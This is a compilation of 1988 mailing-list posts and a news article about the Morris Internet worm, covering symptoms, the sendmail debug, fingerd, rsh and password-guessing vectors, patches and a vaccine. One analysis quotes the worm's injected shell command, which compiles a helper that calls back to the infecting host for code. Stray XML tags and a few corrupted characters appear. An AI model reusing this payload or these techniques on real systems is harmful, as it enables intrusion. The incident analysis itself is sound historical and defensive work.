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PANET VIRUS SC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rama Unf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blow-by-blow description on what took place on Arp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November 3, 1988.  The day the biggest virus scare to date took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essages were captured directly from Arpan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oll@DOCKMASTER.A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Virus on the Arpanet - Mi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Thu, 3 Nov 88 06:46 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 Arpanet "Sendmail" Virus attack November 3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Ga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now 3:45 AM on Wednesday 3 November 1988.  I'm tired, so don't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that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, there is a massive attack on Unix systems going on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poken to systems managers at several computers, on both the east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coast, and I suspect this may be a system wid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ptom: hundreds or thousands of jobs start running on a Uni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ing response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ttacked: Unix systems, 4.3BSD unix &amp; variants (eg: SUNs)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 compiled with debug has this problem. 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irus is spreading very quickly over the Milnet.  Within the pas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, I have evidence that it has hit &gt;10 sites across the country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anet and Milnet sites.  I suspect that well over 50 sites have been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are "major" sites and gate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, someone has written a program that uses a hole in SMTP Send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  This utility can send a message into an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: from a distant Milnet host, a message is sent to Sendmail to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SED, (SED is an editor) This is possible in certain versions of send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 A 99 line C program is sent to SED through Send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:  The distant computer sends a command to compile this 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:  Several object files are copied into the Unix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3 files:  one targeted to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e targeted to SUN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e targeted to vax    (ultrix probably, not v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:  The C program accepts as address other Milnet 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:  Apparently, program scans for other Milnet/arpanet addre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s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g in Send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nix 4.3 BSD version of Sendmail is compiled with the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there's a hole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Unix systems (BSD 4.3 and Suns) apparently do not have this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xists only where the system manager recompiled Sendmail and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ad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ff Stoll dockmaster.ar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ene Spafford &lt;spaf@purdue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ore on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03 Nov 88 09:52:18 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our Vaxen and some of our Suns here were infected with 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 forks repeated copies of itself as it tries to spread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oad averages on the infected machines skyrocketed.  In fac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to the point that some of the machines ran out of swap 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 table entries, preventing login to even see what was going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 seems to consist of two parts.  I managed to grab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or one part, but not the main component (the virus cleans up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so as not to leave evidence).  The way that it works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Virus running on an infected machine opens a TCP connect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im machine's sendmail, invokes debug mode, and gets a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 shell creates a file in /tmp named $$,l1.c (where the $$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the current process id) and copies code for a "listener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er" program.  This is just a few dozen lines long and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code.  The shell compiles this helper using the "cc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e helper is invoked with arguments pointing back at the inf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(giving hostid/socket/passwords as argu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he helper then connects to the "server" and copies a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sumably to /tmp).  After the files are copied, it exec's a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tandard input coming from the infecting virus program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s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here, I speculate on what happens since I can't find the sour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t lying around on our mach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The newly exec'd shell attempts to compile itself from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over to the target machine.  I'm not sure what else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, if anything -- it may also be attempting to add a bogus pas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ntry or do something to the file system.  The helper progr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ray of 20 filenames for the "helper" to copy over, so there is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are.  There are two versions copied -- a version for Vax BSD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or SunOS; the appropriate one is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The new virus is dispatched.  This virus opens all the viru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then unlinks the files so they can't be found (since it ha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, however, it can still access the contents).  Next, the virus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hosts file (on the Sun, it uses YP to step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hosts file) trying to connect to other machines' send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connection succeeds, it forks a child process to infect it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ent continues to attempt infection of oth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The child requests and initializes a new socket, then buil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s a listener with the new socket number and hostid as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#1,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vy load we see is the result of multiple viruses coming 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sites.  Since local hosts files tend to have entries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hosts, the virus tends to infect local machines multiple tim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senses this is lucky since it helps prevent the spr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as the local machines slow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 also "cleans" up after itself.  If you reboot an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(or it crashes), the /tmp directory is normally cleaned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  The other incriminating files were already deleted by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ver, nasty, and definitely anti-so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sp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ishop@bear.Dartmouth.EDU (Matt Bish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ore on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3 Nov 88 16:32:25 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 This program introduced itself through a bug in sendmail.  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, sendmail was compiled and installed with a debugg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n.  As near as I can figure (I don't have access to the send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), by giving a specific option to the "debug" command in send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re are lots of those, controlling what exactly you ge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) you can cause it to execute a command.  As sendmail runs se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oot, guess what privileges the command is executed with.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what the attacker did was this: he or sh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mail (ie, telnet victim.machine 25), issued the appropriate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and had a small C program compiled.  (We have it.  Big dea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took as an argument a host number, and copied two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one ending in q.vax.o and the other ending in .sun.o -- and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nd execute them.  In those cases where the load and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ed, the worm did two things (at least): spawn a lot of sh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d nothing but clog the process table and burn CPU cycles; loo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laces -- the password file and the internet services file --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tes it could connect to (this is hearsay, but I don't doub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inute.) It used both individual .rhost files (which i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assword file), and any other remote hosts it could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t had a chance of connecting to.  It may have done more;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machines had a changed superuser password, but because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we're not sure this worm di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ast part is still sketchy; I have the relevant sun.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take it apart to see just what it was supposed to do. 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it appears there was no serious damage (just wasted CPU cyc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dministrator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obvious po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Whoever did this picked only on suns and vaxen.  One site with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IRISes and two Crays (ie, NASA Ames) got bit on their Suns and Vax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e attempt to get the other machines did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is shows the sorry state of software and security in the UNIX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ople should NEVER put a program with debugging hooks in it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hook is (or can be made) to execute an arbitrary command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how the sendmail which was used was distribu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ore interesting point: initially, I thought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"principle of least privilege" would have prevent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tration.  But the attacker used a world-writeable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rel the relevant programs in, so -- in effect -- everything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done by any user on the system! (Except the superuse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, of course -- if this worm did in fact do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e only way to prevent such an attack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off the deug option on sendmail; then the penetra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.  It goes to show that if the computer is not secure (and like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believe there ever will be such a beastie), there is simp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prevent a virus (or, in this case, a worm) from getting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this is somewhat sketchy, flabby, and fuzzy, but it'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so far.  I'll keep you posted on development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ostic@okeeffe.Berkeley.EDU (Keith Bos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irus (READ THIS IMMEDIATE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3 Nov 88 10:58:55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ixes for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: usr.lib/sendmail/src/srvrsmtp.c 4B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virus running around; the salient facts.  A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 has been used to introduce a virus into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UNIX systems.  It has not been obserw�d to dama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system, however, it's incredibly virulent,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 itself to every system it can find.  It app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rsh, broken passwords, and sendmail to introduc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target systems.  It affects only VAXen and Sun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as w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changes that we believe will immuniz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They are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 Experimental Computing Facility, Cen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ase Control for their assistance.  (It's pretty l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certainly deserved some thanks, somewher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either recompile or patch sendmail to disallow the `debug'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 If you have source, recompile sendmail afte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the following patch to the module svrsmtp.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/tmp/d22039 Thu Nov  3 02:26:20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srvrsmtp.c Thu Nov  3 01:21:04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85,92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reinstall sendmail, refreeze the configura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mmand "/usr/lib/sendmail -bz", kill an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's, using the ps(1) command and the kill(1)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tart your sendmail.  To find out how sendma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ed on your system, use grep(1) to find the sendmai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either the files /etc/rc or /etc/rc.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source, apply the following patch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 binary.  SAVE A COPY OF IT FIRST, IN CASE YOU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!  This is mildly tricky -- note, some versions of strings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're going to use to find the offset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bug" in the binary print out the offsets in octal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.  Run the following shell line to decide h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strings(1)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in/echo 'abcd' | /usr/ucb/strings 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make sure the eight control 'G's are preserv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If this command results in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008 ab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trings(1) command prints out locations in decimal,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oc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 script for sendmail.  NOTE, YOUR OFFSETS MAY VAR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ipt assumes that your strings(1) command print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sets in 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started on Thu Nov  3 02:08:14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ffe:tmp {2} strings -o -a /usr/lib/sendmail | egrep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6972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ffe:tmp {3} adb -w /usr/lib/send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?m 0 0xffffffff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0$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x=10 base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72?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72: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72?w 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72:2570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ffe:tmp {4} ^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done on Thu Nov  3 02:09:31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trings(1) command prints out the offsets in oc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line "0t10$d" to "0t8$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've fixed sendmail, move both /bin/cc and /bin/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else.  (The virus uses the cc and the l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build itself to run on your syst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kill any processes on your system that don't belong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cious ones have "(sh)" or "xNNNNNNN" where the N's ar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, as the command name on the ps(1) outpu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ore thing, if you find files in /tmp or /usr/tm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ames like "xNNNNNN,l1.c", or "xNNNNNN,sun3.o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xNNNNNNN,vax.o" where the N's are random digits, you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news@cs.purdue.EDU (News Kn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3 Nov 88 19:58:27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 from Keith Bostic in the last message is *not* suffic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 the spread of the virus.  We have discovered from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ies that the virus also attempts to spread itself via "r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other machines.  It looks through a *lot* of files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vectors to sp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bunch of machines with hosts.equiv set or .rhosts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hut them *all* down at the same time after you hav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 to prevent a further infestation.  If you don't clear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in memory, you won't protect your oth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 runs itself with the name "sh" and then overwrites argv,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ps ax" shows any processes named "(sh)" without a controlling t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problem.  Due to the use of other uids from rsh, don'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nclusions if the uid is one of your norma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check your mailq (do a mailq command).  If you see an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ipe themselves through sed and sh, delete them from th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restart you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internet sites do not need to worry about this virus (for now!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ware that mail and news may not be flowing everywhere for so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many sites are disconnecting from the Internet completely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is con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ene Spafford &lt;spaf@purdue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Updated worm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04 Nov 88 00:27:54 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updated description of how the worm works (note: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ly a worm, not a virus, since it does not attach its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de {that we know about}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our Vaxen and some of our Suns here were infected with the w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m forks repeated copies of itself as it tries to spread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oad averages on the infected machines skyrocketed.  In fac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to the point that some of the machines ran out of swap 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 table entries, preventing login to even see what was going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m seems to consist of two parts.  The way that it works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Virus running on an infected machine opens a TCP connect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im machine's sendmail, invokes debug mode, and submits a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as a mai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OR* it uses rsh to create itself on the remote machine throug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requiring no password (due to hosts.equiv or .rhosts entr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OR* it gets in via a bug in fingerd *OR* it uses telnet (mor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endmail route, it does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/dev/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"|sed -e 1,/^$/d | sh; exit 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/usr/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 &gt; x14481910.c &lt;&lt;'EOF'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xt of program dele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-o x14481910 x14481910.c;x14481910 128.10.2.215 32341 8712440;rm -f x14481910 x14481910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is program is a simple "listener" or "helper" program of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lines of fairly simple code.  As you can see, the help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with arguments pointing back at the infecting worm (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id/socket/checksum(?) as argu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e helper then connects to the "server" and copies a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sumably to /tmp).  After the files are copied, it exec's a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tandard input coming from the infecting worm program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s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here, I speculate on what happens since I can't find the sour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t lying around on our mach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he newly exec'd shell attempts to compile itself from the files copi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arget machine.  The command file it use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=/bin:/usr/bin:/usr/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-f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[ -f sh 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=x%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=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-o $P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n/echo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./$P -p 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This creates and dispatches the new worm..  This worm open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 source files, then unlinks the files so they can't be found (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them open, however, it can still access the contents).  Nex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 steps through the hosts file (on the Sun, it uses YP to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distributed hosts file) trying to connect to other machin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.  If a connection succeeds, it forks a child process to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while the parent continues to attempt infection of oth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The child requests and initializes a new socket, then buil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s a listener with the new socket number and hostid as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#1,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m runs in stages.  It first collects info from the /etc/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the hosts.equiv file, and other files containing host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IP addresses.  It even runs netstat to find out what networ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is attached to! It uses this information to attempt to pene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 on those machines.  It also knows how to penetrate "fingerd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en (on Suns, the attempt results in a core dump).  I will priv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individuals how to fix the bug in fingerd, but for now change i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run as "ro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first stage, it appears to sleep for a while.  Then it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ng user names and it begins probing with "rsh".  It also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ttack the passwords by trying a set of built-in words,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/usr/dict, and words snarfed from system files.  If it succee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 a local password, it forks a child to use telnet to brea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ccount and cop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 write this, no one seems to know what it is supposed to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  Perhaps it just breaks in everywhere it can.  We do know that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break into any accounts or systems for a while, it enters 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 tries to break the root password via brute force searching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 that if it succeeds it then does very nasty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orrupts its argument vector, so it appears in a "ps ax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(sh)" (a login shell).  Don't trust any of these if you h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oesn't copy around source files (except the helper) -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around pre-compiled binaries that are linked on the local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run.  The worm appears to only be carrying bina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0-based Suns and Vax 7xx and 8800 machines.  Pyramids, Sun 2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s are all definitely immune.  (Note: an infected 8800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 engine of contag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s in the binaries are encrypted against a random "str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.  If you have a binary, Keith Bostic informs me that X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1 will reveal interesting things, although that is not the only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bservation of the virus I have heard about was 6pm Wedn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in Pittsburgh.  It didn't hit Purdue until about 4 this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ere lucky in that other sites, like CMU and Princeton, were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11 last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 Some of the above information was obtained from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or (UCSD), Keith Bostic (UCB), Thomas Narten (Purdue), Dan Trin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urdue), Kevin Braunsdorf (Purdue) and Miek Rowan (Purdue).  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ene Spafford &lt;spaf@purdue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 worm "cond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03 Nov 88 21:20:10 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Kevin Braunsdorf &amp; Rich Kulawiec (Purdue-CC) have come up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dom" to protect your machine against the CURRENT worm. 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 sure it works, but it seems to be completely effective and i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ny harm.  As ROOT,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dir /usr/tmp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od 111 /usr/tmp/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edit your rc.local file to recreate the directory in ca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  This will not stop a current infection, but it will preven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nes from taking hold -- it prevents the worm from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c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--sp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ene Spafford &lt;spaf@purdue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 cure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03 Nov 88 22:04:15 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SH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vin ("Adb's your friend.") Braunsdorf just burst into my offic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 discovered in the disassembled worm bi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n external variable in the library named "pleasequit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n-zero, the worm will die immediately after exiting.  Thus, to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ew worms, include a patch in your library that defines the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hell file and source code will modify your C libr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is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N'T kill any currently linked and running versions, bu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reinf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Shar archive.  Give the following as input to /bin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Packed Thu Nov  3 21:56:35 EST 1988 by spaf@uther.cs.purdu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is archiv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foo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#foo.c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x - foo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 's/^X//' &gt;foo.sh &lt;&lt;'*-*-END-of-foo.sh-*-*'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 -c foo.c -o foo.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 /lib/libc.a /lib/libc.a.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 q /lib/libc.a foo.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nlib /lib/libc.a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>*-*-END-of-foo.sh-*-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x - foo.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 's/^X//' &gt;foo.c &lt;&lt;'*-*-END-of-foo.c-*-*'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tern int pleasequit = -1;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>*-*-END-of-foo.c-*-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eoff@fernwood.mpk.ca.us (the tty of Geoff Goodfel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uter Network Disrupted by `Virus'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3 Nov 88 21:30:19 P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NETWORK DISRUPTED BY `VIRUS'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OHN MARKO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c.1988 N.Y. Times News Service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 intrusion that raises new questions about the vulner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tion's computers, a nationwide Department of Defense dat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disrupted since Wednesday night by a rapidly sp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``virus'' software program apparently introduced by a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's malicious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reproduced itself through the computer network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s of copies in each machine it reached, effectively c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linking thousands of military, corporate and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around the country and preventing them from do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 The virus is thought not to have destroyed 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late Thursday afternoon computer security experts wer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 the largest assault ever on the nation's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`The big issue is that a relatively benign software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bring our computing community to its knees and keep i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time,'' said Chuck Cole, deputy computer security manag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erence Livermore Laboratory in Livermore, Calif., one of the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 by the intrusion.  ``The cost is going to be staggering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fford Stoll,^ @a computer security expert at Harvard Univer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: ``There is not one system manager who is not tearing his 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 It's causing enormous headaches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ffected computers carry routine communications among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s, researchers and corpo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some sensitive military data are involved, the nation'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secret information, such as that on the control of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, is thought not to have been touched by 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viruses are so named because they parallel in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the behavior of biological viruses.  A virus is a program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instructions to a computer, that is deliberately plant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meant to be used with the computer or introduc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s communicating over telephone lines or data net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s can copy themselves into the computer's master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perating system, usually without calling any atten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.  From there, the program can be passed t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ing upon the intent of the software's creator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cause a provocative but otherwise harmless message to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's scrm�o.  Or it could systematically destroy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'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irus program was apparently the result of an experiment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cience graduate student trying to sneak what he though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less virus into the Arpanet computer network, which i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ies, military contractors and the Pentagon, wher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ould remain un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an who said he was an associate of the student sai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call to The New York Times that the experiment went a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a small programming mistake that caused the virus to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military network hundreds of times faster than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ller, who refused to identify himself or the programmer,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udent realized his error shortly after letting the program l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he was now terrified of the con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pokesman at the Pentagon's Defense Communications Agenc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et up an emergency center to deal with the problem, sa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's story was a ``plausible explanation of the events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virus spread Wednesday night, computer experts began a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ggle to eradicate the inv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pokesman for the Defense Communications Agency in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d the attack, saying, ``A virus has been ident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host computers attached to the Arpanet and the unclas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defense data network known as the Milnet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said that corrections to the security flaws exploited by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w being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panet data communications network was established in 196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igned to permit computer researchers to share electronic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data such as project information, budget proje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1983 the network was split and the second network, called Mil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served for higher-security military communications.  But Miln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not to handle the most classified military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data related to the control of nuclear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panet and Milnet networks are connected to hundreds of civi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that link computers around the glo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ere reports of the virus at hundreds of locations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s, including, on the East Coast, computers at the Massachu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e of Technology, Harvard University, the Naval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y in Maryland and the University of Maryland and, on th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, NASA's Ames Research Center in Mountain View, Calif.; Law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more Laboratories; Stanford University; SRI International in Me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, Calif.; the University of California's Berkeley and San D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uses and the Naval Ocean Systems Command in San Die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pokesman at the Naval Ocean Systems Command said that it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had been attacked Wednesday evening and that the viru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many of the systems by overloading them.  He said tha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t the facility were still working on the problem more than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after the original inc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nidentified caller said the Arpanet virus was intended sim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``live'' secretly in the Arpanet network by slowly copying itself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o computer.  However, because the designer did not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how the network worked, it quickly copied itself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from machine to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experts who disassembled the program said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with remarkable skill and that it exploited three security f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rpanet network.  [No.  Actually UNIX] The virus' design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designed to steal passwords, then masquerade as a legi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copy itself to a remot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security experts said that the episode illustr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erability of computer systems and that incidents like thi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happen repeatedly if awareness about computer security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height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`This was an accident waiting to happen; we deserved it,''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ffrey Goodfellow,''(*) president of Anterior Technology Inc. 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 on computer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`We needed something like this to bring us to our senses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en paying much attention to protecting ourselves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ter Neumann, a computer security expert at SRI Internation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nlo Park International, said: ``Thus far the disasters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have been relatively minor.  The potential for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ordinary destruction is rather substa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`In most of the cases we know of, the damage has been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t.  But if you contemplate the`eofects of hidden program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ave attacks going on and you might never know it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 Following is Geoff's full quote ("exploitation"), which Joh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ly integrated with Geoff's earlier off-the-cuff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"accident"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is was an exploitation wanting to happen.  We deserved it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something like this to bring us to our senses.  We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ng much attention to protecting ourselves.  The blame does not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&amp;D community as a whole.  Look how many manufacturers [...]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the original computer-science-department develope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y-nilly, put their wrapper and corporate logo on it, and resol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ustomers.  That's the real travesty here, we build these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that's great, but we rarely build them and then ask how they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used, broken, or circumvented" {and then try to break them}.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end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